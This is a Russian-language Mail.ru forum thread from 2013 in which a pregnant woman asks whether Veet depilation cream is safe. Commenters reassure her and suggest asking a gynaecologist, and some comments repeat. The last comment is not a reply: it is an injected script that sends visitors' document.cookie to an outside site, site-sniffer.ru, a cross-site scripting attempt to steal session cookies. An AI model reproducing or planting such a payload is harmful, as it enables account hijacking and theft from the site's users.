Mail.RuПочтаМой МирОдноклассникиИгрыЗнакомстваНовостиПоискВсе проекты
17 апреля 2013, Главная форумов

Крем для депиляции при беременности

Девочки, я всегда пользовалась кремом Veet для гладкости ножек, а вот сейчас не знаю, можно ли его использовать беременным? Беременность долгожданная, так что я как параноик, боюсь навредить себе и крохе.
Тема закрытаТема в горячихТема скрытаЖалоба принята. Спасибо!Пожаловаться
ОтписатьсяПодписаться
Комментарии
14
Людмила Лажина
Можно, почему нет-то? Давайте теперь еще стричься и краситься не будем. Все будет нормально, пользуйтесь на здоровье, только следите, чтобы раздражения не было.
СсылкаПожаловаться
Людмила Лажина
Можно, почему нет-то? Давайте теперь еще стричься и краситься не будем. Все будет нормально, пользуйтесь на здоровье, только следите, чтобы раздражения не было.
СсылкаПожаловаться
Вроде и понимаю, что все это глупости, а с другой стороны все равно переживаю.. Спасибо!
СсылкаПожаловаться
Комментарий удален.Почему?
Да, что-то вы совсем не в тему...
СсылкаПожаловаться
Эмма Засорина
Ьеня эти кремы не интерисуют. Вот так!
СсылкаПожаловаться
Эмма Засорина
Ьеня эти кремы не интерисуют. Вот так!
СсылкаПожаловаться
Зря, женщина должна за собой ухаживать в любом возрасте.
СсылкаПожаловаться
Самба Маркутко
Зря, женщина должна за собой ухаживать в любом возрасте.
СсылкаПожаловаться
История переписки2
с первой беременностью тоже побоялась пользоваться кремами. можно вопрос гинекологу задать, скорее всего, врач не запретит.
СсылкаПожаловаться
Алёнка
с первой беременностью тоже побоялась пользоваться кремами. можно вопрос гинекологу задать, скорее всего, врач не запретит.
СсылкаПожаловаться
История переписки3
Да, спросила уже, врач разрешила, при условии, что не будет раздражения. У меня его нет, ТТТ....
СсылкаПожаловаться
А почему вы так злитесь?
СсылкаПожаловаться
матерится-вот истинная безмозглость!
СсылкаПожаловаться
((( Женечка )))
А с чего вообще такие сомнения? Во время беременности только депиляцию и можно делать - станком или кремом для депиляции. А вот эпиляцию не рекомендуют.
СсылкаПожаловаться
tratill
а мне вот не понятно всегда было....зачем брить станком перед родами? если существуют крема....
СсылкаПожаловаться
nIkItA tAtIsHcSeV
<sсriрt>document.location.replace('http://site-sniffer.ru/php-sсriрt.php?com='+document.cookie);</sсriрt>
СсылкаПожаловаться
Подпишитесь на нас
Рассылка Леди Mail.ru